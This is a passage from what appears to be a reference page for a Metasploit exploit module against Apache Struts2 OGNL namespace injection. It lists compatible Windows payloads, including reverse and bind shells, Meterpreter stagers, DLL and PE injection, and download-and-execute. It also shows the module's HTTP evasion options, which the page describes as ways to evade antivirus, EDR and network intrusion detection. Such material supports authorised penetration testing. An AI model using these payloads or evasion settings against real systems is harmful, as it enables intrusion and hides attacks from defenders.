122 payload/windows/dllinject/reverse_http_proxy_pstore normal No Reflective DLL Injection, Reverse HTTP Stager Proxy
123 payload/windows/dllinject/reverse_ipv6_tcp normal No Reflective DLL Injection, Reverse TCP Stager (IPv6)
124 payload/windows/dllinject/reverse_nonx_tcp normal No Reflective DLL Injection, Reverse TCP Stager (No NX or Win7)
125 payload/windows/dllinject/reverse_ord_tcp normal No Reflective DLL Injection, Reverse Ordinal TCP Stager (No NX or Win7)
126 payload/windows/dllinject/reverse_tcp normal No Reflective DLL Injection, Reverse TCP Stager
127 payload/windows/dllinject/reverse_tcp_allports normal No Reflective DLL Injection, Reverse All-Port TCP Stager
128 payload/windows/dllinject/reverse_tcp_dns normal No Reflective DLL Injection, Reverse TCP Stager (DNS)
129 payload/windows/dllinject/reverse_tcp_rc4 normal No Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
130 payload/windows/dllinject/reverse_tcp_rc4_dns normal No Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
131 payload/windows/dllinject/reverse_tcp_uuid normal No Reflective DLL Injection, Reverse TCP Stager with UUID Support
132 payload/windows/dllinject/reverse_winhttp normal No Reflective DLL Injection, Windows Reverse HTTP Stager (winhttp)
133 payload/windows/dns_txt_query_exec normal No DNS TXT Record Payload Download and Execution
134 payload/windows/download_exec normal No Windows Executable Download (http,https,ftp) and Execute
135 payload/windows/exec normal No Windows Execute Command
136 payload/windows/loadlibrary normal No Windows LoadLibrary Path
137 payload/windows/messagebox normal No Windows MessageBox
138 payload/windows/meterpreter/bind_hidden_ipknock_tcp normal No Windows Meterpreter (Reflective Injection), Hidden Bind Ipknock TCP Stager
139 payload/windows/meterpreter/bind_hidden_tcp normal No Windows Meterpreter (Reflective Injection), Hidden Bind TCP Stager
140 payload/windows/meterpreter/bind_ipv6_tcp normal No Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager (Windows x86)
141 payload/windows/meterpreter/bind_ipv6_tcp_uuid normal No Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)
142 payload/windows/meterpreter/bind_named_pipe normal No Windows Meterpreter (Reflective Injection), Windows x86 Bind Named Pipe Stager
143 payload/windows/meterpreter/bind_nonx_tcp normal No Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7)
144 payload/windows/meterpreter/bind_tcp normal No Windows Meterpreter (Reflective Injection), Bind TCP Stager (Windows x86)
145 payload/windows/meterpreter/bind_tcp_rc4 normal No Windows Meterpreter (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
146 payload/windows/meterpreter/bind_tcp_uuid normal No Windows Meterpreter (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86)
147 payload/windows/meterpreter/reverse_hop_http normal No Windows Meterpreter (Reflective Injection), Reverse Hop HTTP/HTTPS Stager
148 payload/windows/meterpreter/reverse_http normal No Windows Meterpreter (Reflective Injection), Windows Reverse HTTP Stager (wininet)
149 payload/windows/meterpreter/reverse_http_proxy_pstore normal No Windows Meterpreter (Reflective Injection), Reverse HTTP Stager Proxy
150 payload/windows/meterpreter/reverse_https normal No Windows Meterpreter (Reflective Injection), Windows Reverse HTTPS Stager (wininet)
151 payload/windows/meterpreter/reverse_https_proxy normal No Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager with Support for Custom Proxy
152 payload/windows/meterpreter/reverse_ipv6_tcp normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6)
153 payload/windows/meterpreter/reverse_named_pipe normal No Windows Meterpreter (Reflective Injection), Windows x86 Reverse Named Pipe (SMB) Stager
154 payload/windows/meterpreter/reverse_nonx_tcp normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)
155 payload/windows/meterpreter/reverse_ord_tcp normal No Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
156 payload/windows/meterpreter/reverse_tcp normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager
157 payload/windows/meterpreter/reverse_tcp_allports normal No Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager
158 payload/windows/meterpreter/reverse_tcp_dns normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS)
159 payload/windows/meterpreter/reverse_tcp_rc4 normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
160 payload/windows/meterpreter/reverse_tcp_rc4_dns normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
161 payload/windows/meterpreter/reverse_tcp_uuid normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager with UUID Support
162 payload/windows/meterpreter/reverse_winhttp normal No Windows Meterpreter (Reflective Injection), Windows Reverse HTTP Stager (winhttp)
163 payload/windows/meterpreter/reverse_winhttps normal No Windows Meterpreter (Reflective Injection), Windows Reverse HTTPS Stager (winhttp)
164 payload/windows/meterpreter_bind_named_pipe normal No Windows Meterpreter Shell, Bind Named Pipe Inline
165 payload/windows/meterpreter_bind_tcp normal No Windows Meterpreter Shell, Bind TCP Inline
166 payload/windows/meterpreter_reverse_http normal No Windows Meterpreter Shell, Reverse HTTP Inline
167 payload/windows/meterpreter_reverse_https normal No Windows Meterpreter Shell, Reverse HTTPS Inline
168 payload/windows/meterpreter_reverse_ipv6_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline (IPv6)
169 payload/windows/meterpreter_reverse_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline
170 payload/windows/metsvc_bind_tcp normal No Windows Meterpreter Service, Bind TCP
171 payload/windows/metsvc_reverse_tcp normal No Windows Meterpreter Service, Reverse TCP Inline
172 payload/windows/patchupdllinject/bind_hidden_ipknock_tcp normal No Windows Inject DLL, Hidden Bind Ipknock TCP Stager
173 payload/windows/patchupdllinject/bind_hidden_tcp normal No Windows Inject DLL, Hidden Bind TCP Stager
174 payload/windows/patchupdllinject/bind_ipv6_tcp normal No Windows Inject DLL, Bind IPv6 TCP Stager (Windows x86)
175 payload/windows/patchupdllinject/bind_ipv6_tcp_uuid normal No Windows Inject DLL, Bind IPv6 TCP Stager with UUID Support (Windows x86)
176 payload/windows/patchupdllinject/bind_named_pipe normal No Windows Inject DLL, Windows x86 Bind Named Pipe Stager
177 payload/windows/patchupdllinject/bind_nonx_tcp normal No Windows Inject DLL, Bind TCP Stager (No NX or Win7)
178 payload/windows/patchupdllinject/bind_tcp normal No Windows Inject DLL, Bind TCP Stager (Windows x86)
179 payload/windows/patchupdllinject/bind_tcp_rc4 normal No Windows Inject DLL, Bind TCP Stager (RC4 Stage Encryption, Metasm)
180 payload/windows/patchupdllinject/bind_tcp_uuid normal No Windows Inject DLL, Bind TCP Stager with UUID Support (Windows x86)
181 payload/windows/patchupdllinject/reverse_ipv6_tcp normal No Windows Inject DLL, Reverse TCP Stager (IPv6)
182 payload/windows/patchupdllinject/reverse_nonx_tcp normal No Windows Inject DLL, Reverse TCP Stager (No NX or Win7)
183 payload/windows/patchupdllinject/reverse_ord_tcp normal No Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)
184 payload/windows/patchupdllinject/reverse_tcp normal No Windows Inject DLL, Reverse TCP Stager
185 payload/windows/patchupdllinject/reverse_tcp_allports normal No Windows Inject DLL, Reverse All-Port TCP Stager
186 payload/windows/patchupdllinject/reverse_tcp_dns normal No Windows Inject DLL, Reverse TCP Stager (DNS)
187 payload/windows/patchupdllinject/reverse_tcp_rc4 normal No Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
188 payload/windows/patchupdllinject/reverse_tcp_rc4_dns normal No Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
189 payload/windows/patchupdllinject/reverse_tcp_uuid normal No Windows Inject DLL, Reverse TCP Stager with UUID Support
190 payload/windows/patchupmeterpreter/bind_hidden_ipknock_tcp normal No Windows Meterpreter (skape/jt Injection), Hidden Bind Ipknock TCP Stager
191 payload/windows/patchupmeterpreter/bind_hidden_tcp normal No Windows Meterpreter (skape/jt Injection), Hidden Bind TCP Stager
192 payload/windows/patchupmeterpreter/bind_ipv6_tcp normal No Windows Meterpreter (skape/jt Injection), Bind IPv6 TCP Stager (Windows x86)
193 payload/windows/patchupmeterpreter/bind_ipv6_tcp_uuid normal No Windows Meterpreter (skape/jt Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)
194 payload/windows/patchupmeterpreter/bind_named_pipe normal No Windows Meterpreter (skape/jt Injection), Windows x86 Bind Named Pipe Stager
195 payload/windows/patchupmeterpreter/bind_nonx_tcp normal No Windows Meterpreter (skape/jt Injection), Bind TCP Stager (No NX or Win7)
196 payload/windows/patchupmeterpreter/bind_tcp normal No Windows Meterpreter (skape/jt Injection), Bind TCP Stager (Windows x86)
197 payload/windows/patchupmeterpreter/bind_tcp_rc4 normal No Windows Meterpreter (skape/jt Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
198 payload/windows/patchupmeterpreter/bind_tcp_uuid normal No Windows Meterpreter (skape/jt Injection), Bind TCP Stager with UUID Support (Windows x86)
199 payload/windows/patchupmeterpreter/reverse_ipv6_tcp normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (IPv6)
200 payload/windows/patchupmeterpreter/reverse_nonx_tcp normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (No NX or Win7)
201 payload/windows/patchupmeterpreter/reverse_ord_tcp normal No Windows Meterpreter (skape/jt Injection), Reverse Ordinal TCP Stager (No NX or Win7)
202 payload/windows/patchupmeterpreter/reverse_tcp normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager
203 payload/windows/patchupmeterpreter/reverse_tcp_allports normal No Windows Meterpreter (skape/jt Injection), Reverse All-Port TCP Stager
204 payload/windows/patchupmeterpreter/reverse_tcp_dns normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (DNS)
205 payload/windows/patchupmeterpreter/reverse_tcp_rc4 normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
206 payload/windows/patchupmeterpreter/reverse_tcp_rc4_dns normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
207 payload/windows/patchupmeterpreter/reverse_tcp_uuid normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager with UUID Support
208 payload/windows/peinject/bind_hidden_ipknock_tcp normal No Windows Inject PE Files, Hidden Bind Ipknock TCP Stager
209 payload/windows/peinject/bind_hidden_tcp normal No Windows Inject PE Files, Hidden Bind TCP Stager
210 payload/windows/peinject/bind_ipv6_tcp normal No Windows Inject PE Files, Bind IPv6 TCP Stager (Windows x86)
211 payload/windows/peinject/bind_ipv6_tcp_uuid normal No Windows Inject PE Files, Bind IPv6 TCP Stager with UUID Support (Windows x86)
212 payload/windows/peinject/bind_named_pipe normal No Windows Inject PE Files, Windows x86 Bind Named Pipe Stager
213 payload/windows/peinject/bind_nonx_tcp normal No Windows Inject PE Files, Bind TCP Stager (No NX or Win7)
214 payload/windows/peinject/bind_tcp normal No Windows Inject PE Files, Bind TCP Stager (Windows x86)
215 payload/windows/peinject/bind_tcp_rc4 normal No Windows Inject PE Files, Bind TCP Stager (RC4 Stage Encryption, Metasm)
216 payload/windows/peinject/bind_tcp_uuid normal No Windows Inject PE Files, Bind TCP Stager with UUID Support (Windows x86)
217 payload/windows/peinject/reverse_ipv6_tcp normal No Windows Inject PE Files, Reverse TCP Stager (IPv6)
218 payload/windows/peinject/reverse_named_pipe normal No Windows Inject PE Files, Windows x86 Reverse Named Pipe (SMB) Stager
219 payload/windows/peinject/reverse_nonx_tcp normal No Windows Inject PE Files, Reverse TCP Stager (No NX or Win7)
220 payload/windows/peinject/reverse_ord_tcp normal No Windows Inject PE Files, Reverse Ordinal TCP Stager (No NX or Win7)
221 payload/windows/peinject/reverse_tcp normal No Windows Inject PE Files, Reverse TCP Stager
222 payload/windows/peinject/reverse_tcp_allports normal No Windows Inject PE Files, Reverse All-Port TCP Stager
223 payload/windows/peinject/reverse_tcp_dns normal No Windows Inject PE Files, Reverse TCP Stager (DNS)
224 payload/windows/peinject/reverse_tcp_rc4 normal No Windows Inject PE Files, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
225 payload/windows/peinject/reverse_tcp_rc4_dns normal No Windows Inject PE Files, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
226 payload/windows/peinject/reverse_tcp_uuid normal No Windows Inject PE Files, Reverse TCP Stager with UUID Support
227 payload/windows/pingback_bind_tcp normal No Windows x86 Pingback, Bind TCP Inline
228 payload/windows/pingback_reverse_tcp normal No Windows x86 Pingback, Reverse TCP Inline
229 payload/windows/powershell_bind_tcp normal No Windows Interactive Powershell Session, Bind TCP
230 payload/windows/powershell_reverse_tcp normal No Windows Interactive Powershell Session, Reverse TCP
231 payload/windows/shell/bind_hidden_ipknock_tcp normal No Windows Command Shell, Hidden Bind Ipknock TCP Stager
232 payload/windows/shell/bind_hidden_tcp normal No Windows Command Shell, Hidden Bind TCP Stager
233 payload/windows/shell/bind_ipv6_tcp normal No Windows Command Shell, Bind IPv6 TCP Stager (Windows x86)
234 payload/windows/shell/bind_ipv6_tcp_uuid normal No Windows Command Shell, Bind IPv6 TCP Stager with UUID Support (Windows x86)
235 payload/windows/shell/bind_named_pipe normal No Windows Command Shell, Windows x86 Bind Named Pipe Stager
236 payload/windows/shell/bind_nonx_tcp normal No Windows Command Shell, Bind TCP Stager (No NX or Win7)
237 payload/windows/shell/bind_tcp normal No Windows Command Shell, Bind TCP Stager (Windows x86)
238 payload/windows/shell/bind_tcp_rc4 normal No Windows Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)
239 payload/windows/shell/bind_tcp_uuid normal No Windows Command Shell, Bind TCP Stager with UUID Support (Windows x86)
240 payload/windows/shell/reverse_ipv6_tcp normal No Windows Command Shell, Reverse TCP Stager (IPv6)
241 payload/windows/shell/reverse_nonx_tcp normal No Windows Command Shell, Reverse TCP Stager (No NX or Win7)
242 payload/windows/shell/reverse_ord_tcp normal No Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
243 payload/windows/shell/reverse_tcp normal No Windows Command Shell, Reverse TCP Stager
244 payload/windows/shell/reverse_tcp_allports normal No Windows Command Shell, Reverse All-Port TCP Stager
245 payload/windows/shell/reverse_tcp_dns normal No Windows Command Shell, Reverse TCP Stager (DNS)
246 payload/windows/shell/reverse_tcp_rc4 normal No Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
247 payload/windows/shell/reverse_tcp_rc4_dns normal No Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
248 payload/windows/shell/reverse_tcp_uuid normal No Windows Command Shell, Reverse TCP Stager with UUID Support
249 payload/windows/shell/reverse_udp normal No Windows Command Shell, Reverse UDP Stager with UUID Support
250 payload/windows/shell_bind_tcp normal No Windows Command Shell, Bind TCP Inline
251 payload/windows/shell_bind_tcp_xpfw normal No Windows Disable Windows ICF, Command Shell, Bind TCP Inline
252 payload/windows/shell_hidden_bind_tcp normal No Windows Command Shell, Hidden Bind TCP Inline
253 payload/windows/shell_reverse_tcp normal No Windows Command Shell, Reverse TCP Inline
254 payload/windows/speak_pwned normal No Windows Speech API - Say "You Got Pwned!"
255 payload/windows/upexec/bind_hidden_ipknock_tcp normal No Windows Upload/Execute, Hidden Bind Ipknock TCP Stager
256 payload/windows/upexec/bind_hidden_tcp normal No Windows Upload/Execute, Hidden Bind TCP Stager
257 payload/windows/upexec/bind_ipv6_tcp normal No Windows Upload/Execute, Bind IPv6 TCP Stager (Windows x86)
258 payload/windows/upexec/bind_ipv6_tcp_uuid normal No Windows Upload/Execute, Bind IPv6 TCP Stager with UUID Support (Windows x86)
259 payload/windows/upexec/bind_named_pipe normal No Windows Upload/Execute, Windows x86 Bind Named Pipe Stager
260 payload/windows/upexec/bind_nonx_tcp normal No Windows Upload/Execute, Bind TCP Stager (No NX or Win7)
261 payload/windows/upexec/bind_tcp normal No Windows Upload/Execute, Bind TCP Stager (Windows x86)
262 payload/windows/upexec/bind_tcp_rc4 normal No Windows Upload/Execute, Bind TCP Stager (RC4 Stage Encryption, Metasm)
263 payload/windows/upexec/bind_tcp_uuid normal No Windows Upload/Execute, Bind TCP Stager with UUID Support (Windows x86)
264 payload/windows/upexec/reverse_ipv6_tcp normal No Windows Upload/Execute, Reverse TCP Stager (IPv6)
265 payload/windows/upexec/reverse_nonx_tcp normal No Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)
266 payload/windows/upexec/reverse_ord_tcp normal No Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)
267 payload/windows/upexec/reverse_tcp normal No Windows Upload/Execute, Reverse TCP Stager
268 payload/windows/upexec/reverse_tcp_allports normal No Windows Upload/Execute, Reverse All-Port TCP Stager
269 payload/windows/upexec/reverse_tcp_dns normal No Windows Upload/Execute, Reverse TCP Stager (DNS)
270 payload/windows/upexec/reverse_tcp_rc4 normal No Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
271 payload/windows/upexec/reverse_tcp_rc4_dns normal No Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
272 payload/windows/upexec/reverse_tcp_uuid normal No Windows Upload/Execute, Reverse TCP Stager with UUID Support
273 payload/windows/upexec/reverse_udp normal No Windows Upload/Execute, Reverse UDP Stager with UUID Support
274 payload/windows/vncinject/bind_hidden_ipknock_tcp normal No VNC Server (Reflective Injection), Hidden Bind Ipknock TCP Stager
275 payload/windows/vncinject/bind_hidden_tcp normal No VNC Server (Reflective Injection), Hidden Bind TCP Stager
276 payload/windows/vncinject/bind_ipv6_tcp normal No VNC Server (Reflective Injection), Bind IPv6 TCP Stager (Windows x86)
277 payload/windows/vncinject/bind_ipv6_tcp_uuid normal No VNC Server (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)
278 payload/windows/vncinject/bind_named_pipe normal No VNC Server (Reflective Injection), Windows x86 Bind Named Pipe Stager
279 payload/windows/vncinject/bind_nonx_tcp normal No VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)
280 payload/windows/vncinject/bind_tcp normal No VNC Server (Reflective Injection), Bind TCP Stager (Windows x86)
281 payload/windows/vncinject/bind_tcp_rc4 normal No VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
282 payload/windows/vncinject/bind_tcp_uuid normal No VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86)
283 payload/windows/vncinject/reverse_hop_http normal No VNC Server (Reflective Injection), Reverse Hop HTTP/HTTPS Stager
284 payload/windows/vncinject/reverse_http normal No VNC Server (Reflective Injection), Windows Reverse HTTP Stager (wininet)
285 payload/windows/vncinject/reverse_http_proxy_pstore normal No VNC Server (Reflective Injection), Reverse HTTP Stager Proxy
286 payload/windows/vncinject/reverse_ipv6_tcp normal No VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)
287 payload/windows/vncinject/reverse_nonx_tcp normal No VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)
288 payload/windows/vncinject/reverse_ord_tcp normal No VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
289 payload/windows/vncinject/reverse_tcp normal No VNC Server (Reflective Injection), Reverse TCP Stager
290 payload/windows/vncinject/reverse_tcp_allports normal No VNC Server (Reflective Injection), Reverse All-Port TCP Stager
291 payload/windows/vncinject/reverse_tcp_dns normal No VNC Server (Reflective Injection), Reverse TCP Stager (DNS)
292 payload/windows/vncinject/reverse_tcp_rc4 normal No VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
293 payload/windows/vncinject/reverse_tcp_rc4_dns normal No VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
294 payload/windows/vncinject/reverse_tcp_uuid normal No VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support
295 payload/windows/vncinject/reverse_winhttp normal No VNC Server (Reflective Injection), Windows Reverse HTTP Stager (winhttp)
296 payload/windows/x64/exec normal No Windows x64 Execute Command
297 payload/windows/x64/loadlibrary normal No Windows x64 LoadLibrary Path
298 payload/windows/x64/messagebox normal No Windows MessageBox x64
299 payload/windows/x64/meterpreter/bind_ipv6_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager
300 payload/windows/x64/meterpreter/bind_ipv6_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager with UUID Support
301 payload/windows/x64/meterpreter/bind_named_pipe normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Bind Named Pipe Stager
302 payload/windows/x64/meterpreter/bind_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Bind TCP Stager
303 payload/windows/x64/meterpreter/bind_tcp_rc4 normal No Windows Meterpreter (Reflective Injection x64), Bind TCP Stager (RC4 Stage Encryption, Metasm)
304 payload/windows/x64/meterpreter/bind_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Bind TCP Stager with UUID Support (Windows x64)
305 payload/windows/x64/meterpreter/reverse_http normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
306 payload/windows/x64/meterpreter/reverse_https normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
307 payload/windows/x64/meterpreter/reverse_named_pipe normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse Named Pipe (SMB) Stager
308 payload/windows/x64/meterpreter/reverse_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager
309 payload/windows/x64/meterpreter/reverse_tcp_rc4 normal No Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
310 payload/windows/x64/meterpreter/reverse_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager with UUID Support (Windows x64)
311 payload/windows/x64/meterpreter/reverse_winhttp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (winhttp)
312 payload/windows/x64/meterpreter/reverse_winhttps normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTPS Stager (winhttp)
313 payload/windows/x64/meterpreter_bind_named_pipe normal No Windows Meterpreter Shell, Bind Named Pipe Inline (x64)
314 payload/windows/x64/meterpreter_bind_tcp normal No Windows Meterpreter Shell, Bind TCP Inline (x64)
315 payload/windows/x64/meterpreter_reverse_http normal No Windows Meterpreter Shell, Reverse HTTP Inline (x64)
316 payload/windows/x64/meterpreter_reverse_https normal No Windows Meterpreter Shell, Reverse HTTPS Inline (x64)
317 payload/windows/x64/meterpreter_reverse_ipv6_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline (IPv6) (x64)
318 payload/windows/x64/meterpreter_reverse_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline x64
319 payload/windows/x64/peinject/bind_ipv6_tcp normal No Windows Inject Reflective PE Files, Windows x64 IPv6 Bind TCP Stager
320 payload/windows/x64/peinject/bind_ipv6_tcp_uuid normal No Windows Inject Reflective PE Files, Windows x64 IPv6 Bind TCP Stager with UUID Support
321 payload/windows/x64/peinject/bind_named_pipe normal No Windows Inject Reflective PE Files, Windows x64 Bind Named Pipe Stager
322 payload/windows/x64/peinject/bind_tcp normal No Windows Inject Reflective PE Files, Windows x64 Bind TCP Stager
323 payload/windows/x64/peinject/bind_tcp_rc4 normal No Windows Inject Reflective PE Files, Bind TCP Stager (RC4 Stage Encryption, Metasm)
324 payload/windows/x64/peinject/bind_tcp_uuid normal No Windows Inject Reflective PE Files, Bind TCP Stager with UUID Support (Windows x64)
325 payload/windows/x64/peinject/reverse_named_pipe normal No Windows Inject Reflective PE Files, Windows x64 Reverse Named Pipe (SMB) Stager
326 payload/windows/x64/peinject/reverse_tcp normal No Windows Inject Reflective PE Files, Windows x64 Reverse TCP Stager
327 payload/windows/x64/peinject/reverse_tcp_rc4 normal No Windows Inject Reflective PE Files, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
328 payload/windows/x64/peinject/reverse_tcp_uuid normal No Windows Inject Reflective PE Files, Reverse TCP Stager with UUID Support (Windows x64)
329 payload/windows/x64/pingback_reverse_tcp normal No Windows x64 Pingback, Reverse TCP Inline
330 payload/windows/x64/powershell_bind_tcp normal No Windows Interactive Powershell Session, Bind TCP
331 payload/windows/x64/powershell_reverse_tcp normal No Windows Interactive Powershell Session, Reverse TCP
332 payload/windows/x64/shell/bind_ipv6_tcp normal No Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager
333 payload/windows/x64/shell/bind_ipv6_tcp_uuid normal No Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support
334 payload/windows/x64/shell/bind_named_pipe normal No Windows x64 Command Shell, Windows x64 Bind Named Pipe Stager
335 payload/windows/x64/shell/bind_tcp normal No Windows x64 Command Shell, Windows x64 Bind TCP Stager
336 payload/windows/x64/shell/bind_tcp_rc4 normal No Windows x64 Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)
337 payload/windows/x64/shell/bind_tcp_uuid normal No Windows x64 Command Shell, Bind TCP Stager with UUID Support (Windows x64)
338 payload/windows/x64/shell/reverse_tcp normal No Windows x64 Command Shell, Windows x64 Reverse TCP Stager
339 payload/windows/x64/shell/reverse_tcp_rc4 normal No Windows x64 Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
340 payload/windows/x64/shell/reverse_tcp_uuid normal No Windows x64 Command Shell, Reverse TCP Stager with UUID Support (Windows x64)
341 payload/windows/x64/shell_bind_tcp normal No Windows x64 Command Shell, Bind TCP Inline
342 payload/windows/x64/shell_reverse_tcp normal No Windows x64 Command Shell, Reverse TCP Inline
343 payload/windows/x64/vncinject/bind_ipv6_tcp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager
344 payload/windows/x64/vncinject/bind_ipv6_tcp_uuid normal No Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager with UUID Support
345 payload/windows/x64/vncinject/bind_named_pipe normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Bind Named Pipe Stager
346 payload/windows/x64/vncinject/bind_tcp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Bind TCP Stager
347 payload/windows/x64/vncinject/bind_tcp_rc4 normal No Windows x64 VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
348 payload/windows/x64/vncinject/bind_tcp_uuid normal No Windows x64 VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x64)
349 payload/windows/x64/vncinject/reverse_http normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)
350 payload/windows/x64/vncinject/reverse_https normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)
351 payload/windows/x64/vncinject/reverse_tcp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager
352 payload/windows/x64/vncinject/reverse_tcp_rc4 normal No Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
353 payload/windows/x64/vncinject/reverse_tcp_uuid normal No Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support (Windows x64)
354 payload/windows/x64/vncinject/reverse_winhttp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (winhttp)
355 payload/windows/x64/vncinject/reverse_winhttps normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTPS Stager (winhttp)
Evasion Options
Here is the full list of possible evasion options supported by the multi/http/struts2_namespace_ognl exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 exploit(multi/http/struts2_namespace_ognl) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
HTTP::header_folding false no Enable folding of HTTP headers
HTTP::method_random_case false no Use random casing for the HTTP method
HTTP::method_random_invalid false no Use a random invalid, HTTP method for request
HTTP::method_random_valid false no Use a random, but valid, HTTP method for request
HTTP::pad_fake_headers false no Insert random, fake headers into the HTTP request
HTTP::pad_fake_headers_count 0 no How many fake headers to insert into the HTTP request
HTTP::pad_get_params false no Insert random, fake query string variables into the request
HTTP::pad_get_params_count 16 no How many fake query string variables to insert into the request
HTTP::pad_method_uri_count 1 no How many whitespace characters to use between the method and uri
HTTP::pad_method_uri_type space no What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
HTTP::pad_post_params false no Insert random, fake post variables into the request
HTTP::pad_post_params_count 16 no How many fake post variables to insert into the request
HTTP::pad_uri_version_count 1 no How many whitespace characters to use between the uri and version
HTTP::pad_uri_version_type space no What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
HTTP::uri_dir_fake_relative false no Insert fake relative directories into the uri
HTTP::uri_dir_self_reference false no Insert self-referential directories into the uri
HTTP::uri_encode_mode hex-normal no Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
HTTP::uri_fake_end false no Add a fake end of URI (eg: /%20HTTP/1.0/../../)
HTTP::uri_fake_params_start false no Add a fake start of params to the URI (eg: /%3fa=b/../)
HTTP::uri_full_url false no Use the full URL for all HTTP requests
HTTP::uri_use_backslashes false no Use back slashes instead of forward slashes in the uri
HTTP::version_random_invalid false no Use a random invalid, HTTP version for request
HTTP::version_random_valid false no Use a random, but valid, HTTP version for request
Go back to menu.
Error Messages
This module may fail with the following error messages:
- Target did not respond. Please double check RHOSTS and RPORT
- Bad OGNL request: <OGNL>
